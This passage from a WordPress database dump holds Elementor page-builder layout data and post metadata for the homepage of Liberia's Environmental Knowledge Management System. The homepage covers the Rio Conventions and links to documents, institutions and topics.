center\",\"background_attachment\":\"fixed\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"0\",\"bottom\":\"100\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"cc16d03\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"150\",\"isLinked\":false}},\"elements\":[{\"id\":\"b4fc23b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"45201a0\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"f419151\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false}},\"elements\":[{\"id\":\"99692db\",\"elType\":\"widget\",\"settings\":{\"title\":\"Explore by Documents\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f7b0473\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Explore the EKMS Document Database.\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"259a529\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore All Documents\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/documents-and-other-resources\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"left\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"876ae3f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"37e777c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"81fa289\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9f9c8b3\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8aa33ed\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"db429d4\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_color\":\"#002600\",\"shape_divider_bottom_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"shape_divider_bottom_height\":{\"unit\":\"px\",\"size\":82,\"sizes\":[]},\"shape_divider_bottom_flip\":\"yes\",\"padding\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5a37cd7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"df23907\",\"elType\":\"widget\",\"settings\":{\"title\":\"Multilateral Environmental Agreements\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":35,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"49af793\",\"elType\":\"widget\",\"settings\":{\"items_list\":[{\"item_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_cbd-1.jpg\",\"id\":1854},\"item_title\":\"UNCBD\",\"item_text\":\"The United Nations Convention on Biological Diversity\",\"item_link\":\"#\",\"item_link_target\":\"\",\"_id\":\"7311fcf\",\"item_content_type\":\"default\",\"item_link_rel\":\"\",\"item_button_text\":\"\",\"template_id\":\"0\"},{\"item_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_fccc.jpg\",\"id\":1856},\"item_content_type\":\"default\",\"item_title\":\"UNFCCC\",\"item_text\":\"The United Nations Framework Convention on Climate Change\",\"item_link\":\"\",\"item_link_target\":\"\",\"item_link_rel\":\"\",\"item_button_text\":\"\",\"template_id\":\"0\",\"_id\":\"8abca95\"},{\"item_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_ccd.jpg\",\"id\":1855},\"item_content_type\":\"default\",\"item_title\":\"UNCCD\",\"item_text\":\"The United Nations Convention to Combat Desertification\",\"item_link\":\"\",\"item_link_target\":\"\",\"item_link_rel\":\"\",\"item_button_text\":\"\",\"template_id\":\"0\",\"_id\":\"6b2d2f2\"}],\"item_layout\":\"banners\",\"animation_effect\":\"sarah\",\"img_size\":\"medium\",\"title_html_tag\":\"h6\",\"equal_height_cols\":\"true\",\"slides_to_scroll\":\"3\",\"pause_on_hover\":\"true\",\"autoplay_speed\":2500,\"centered\":\"true\",\"background_background\":\"classic\",\"normal_opacity\":0.4,\"hover_opacity\":0.6,\"items_title_color\":\"#ffffff\",\"items_title_typography_typography\":\"custom\",\"items_title_typography_font_size\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"items_title_typography_font_weight\":\"900\",\"items_title_typography_letter_spacing\":{\"unit\":\"px\",\"size\":2.5,\"sizes\":[]},\"items_text_color\":\"#009ee2\",\"items_text_typography_typography\":\"custom\",\"items_text_typography_font_size\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]},\"items_text_typography_font_weight\":\"700\"},\"elements\":[],\"widgetType\":\"jet-carousel\"},{\"id\":\"c151e2c\",\"elType\":\"widget\",\"settings\":{\"text\":\"View All Agreements\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/multilateral-environmental-agreements\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d48ccf5\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"37e777c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"0881e40\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"290555e\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"533b1b7\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"a8f2e29\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_color\":\"#000000\",\"padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"30\",\"bottom\":\"30\",\"left\":\"30\",\"isLinked\":true}},\"elements\":[{\"id\":\"46a8277\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"8076ded\",\"elType\":\"widget\",\"settings\":{\"title\":\"Start Contributing to the EKMS\",\"description\":\"Does your organization or institution work to complement the growing agenda on the Rio Conventions within Liberia? Are you interested in contributing to the knowledge resource by submitting a blog, news, story, case study, report or a publication?\",\"btn_text\":\"Join the team\",\"btn_link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/contribute\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"icon\":\"fa fa-angle-double-right\",\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"title_color\":\"#006400\",\"description_color\":\"#ffffff\",\"button_background_color\":\"#006400\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"oew-call-to-action\"}],\"isInner\":false}],\"isInner\":false}]'),(11526,1869,'_elementor_version','2.7.5'),(11527,1869,'_elementor_template_type','wp-page'),(11528,1869,'_elementor_page_settings','a:1:{s:21:\"background_background\";s:7:\"classic\";}'),(11530,1870,'_edit_lock','1573522853:1'),(11531,1870,'_edit_last','1'),(11532,1870,'_thumbnail_id','1854'),(11533,1870,'_wp_page_template','default'),(11534,1870,'_elementor_controls_usage','a:0:{}'),(11535,1872,'_thumbnail_id','1855'),(11536,1872,'_wp_page_template','default'),(11537,1872,'_elementor_controls_usage','a:0:{}'),(11538,1872,'_dp_original','1870'),(11539,1872,'_edit_lock','1618235501:42'),(11540,1872,'_edit_last','1'),(11541,1877,'_thumbnail_id','2158'),(11542,1877,'_wp_page_template','default'),(11543,1877,'_elementor_controls_usage','a:0:{}'),(11544,1877,'_dp_original','1870'),(11545,1877,'_edit_lock','1618236013:42'),(11546,1877,'_edit_last','1'),(11547,1877,'_wp_old_slug','united-nations-convention-on-biological-diversity-2'),(11548,1880,'_wp_page_template','default'),(11549,1880,'_elementor_edit_mode','builder'),(11550,1880,'_elementor_data','[{\"id\":\"lnk9sxt\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":900},\"height\":\"min-height\",\"custom_height\":{\"unit\":\"px\",\"size\":600},\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_cbd.jpg\",\"id\":531},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"background_overlay_background\":\"classic\",\"background_overlay_color\":\"#113b66\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.55},\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"fabc2a1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"ghttmw8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"3q0r5o4\",\"elType\":\"widget\",\"settings\":{\"title\":\"Welcome to the EKMS\",\"align\":\"center\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":55},\"typography_text_transform\":\"uppercase\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"4\",\"left\":\"0\",\"isLinked\":false},\"_css_classes\":\"no-margin\",\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":25}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f0wlz1l\",\"elType\":\"widget\",\"settings\":{\"editor\":\"The Environmental Knowledge Management System provides free and open access to information from key government and other institutions relating to the implementation of Rio Conventions. Explore the Knowledge Resources by Related Themes, Institutions and Documents.\",\"align\":\"center\",\"text_color\":\"#ffffff\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]},\"typography_font_weight\":\"700\",\"typography_font_family\":\"Arial\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"f4a4a39\",\"elType\":\"widget\",\"settings\":{\"search_placeholder_text\":\"Search Knowledge Resources...\",\"show_search_category_list\":\"yes\",\"search_category_select_placeholder\":\"Entire Resource\",\"results_counter_text\":\"Results\",\"full_results_btn_text\":\"See all results\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c6a37ad\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c698fbe\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"negative_search\":\"Sorry, but nothing matched your search terms.\",\"server_error\":\"Sorry, but we cannot handle your search query now. Please, try again later!\",\"search_submit_bg_color\":\"rgba(0,100,0,0.86)\",\"search_category_color\":\"#000000\",\"search_taxonomy\":\"resource_category\"},\"elements\":[],\"widgetType\":\"jet-ajax-search\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3b467af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"4a9f59c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"40\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"fb58b71\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"f8f4095\",\"elType\":\"widget\",\"settings\":{\"title\":\"Knowledge Resources\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#54595f\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":35,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"62059d5\",\"elType\":\"widget\",\"settings\":{\"style\":\"dotted\",\"width\":{\"unit\":\"%\",\"size\":10,\"sizes\":[]},\"align\":\"center\",\"text\":\"Divider\",\"color\":\"#54595f\",\"weight\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"cc6fadf\",\"elType\":\"widget\",\"settings\":{\"min_height\":{\"unit\":\"px\",\"size\":450,\"sizes\":[]},\"show_terms\":\"\",\"show_terms_num\":\"2\",\"excerpt_length\":\"\",\"excerpt_trimmed_ending\":\"...\",\"show_date\":\"\",\"post_type\":\"related_topic\",\"custom_query_by\":\"ids\",\"post_ids\":\"468,470,473,474,487\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"5b2266b\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"76431bc\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"boxes_gap\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"boxes_title_color\":\"#ffffff\",\"boxes_title_color_hover\":\"#006400\",\"boxes_title_typography_typography\":\"custom\",\"boxes_title_typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"boxes_title_typography_font_weight\":\"900\",\"boxes_title_alignment\":\"left\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-tiles\"},{\"id\":\"724fd77\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore All Topics\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/related-topics\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"89e8d8c\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0fea759\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/home_4.jpg\",\"id\":258},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"0\",\"bottom\":\"100\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5c4a65b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"150\",\"isLinked\":false}},\"elements\":[{\"id\":\"b82855d\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"45201a0\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"9b26f8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false}},\"elements\":[{\"id\":\"8d9d9b1\",\"elType\":\"widget\",\"settings\":{\"title\":\"Explore by Institution\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"7448ecc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Explore Government and Other Institutions that have direct linkages with environmental policies and development.\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"cdd4f69\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore By Insitution\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/institutions-resources\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"left\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a2777f6\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0fea759\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_land_climate.jpg\",\"id\":493},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"0\",\"bottom\":\"100\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"cc16d03\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"150\",\"isLinked\":false}},\"elements\":[{\"id\":\"b4fc23b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"45201a0\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"f419151\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false}},\"elements\":[{\"id\":\"99692db\",\"elType\":\"widget\",\"settings\":{\"title\":\"Explore by Documents\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f7b0473\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Explore the EKMS Document Database.\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"259a529\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore All Documents\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/documents-and-other-resources\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"left\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"876ae3f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"37e777c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1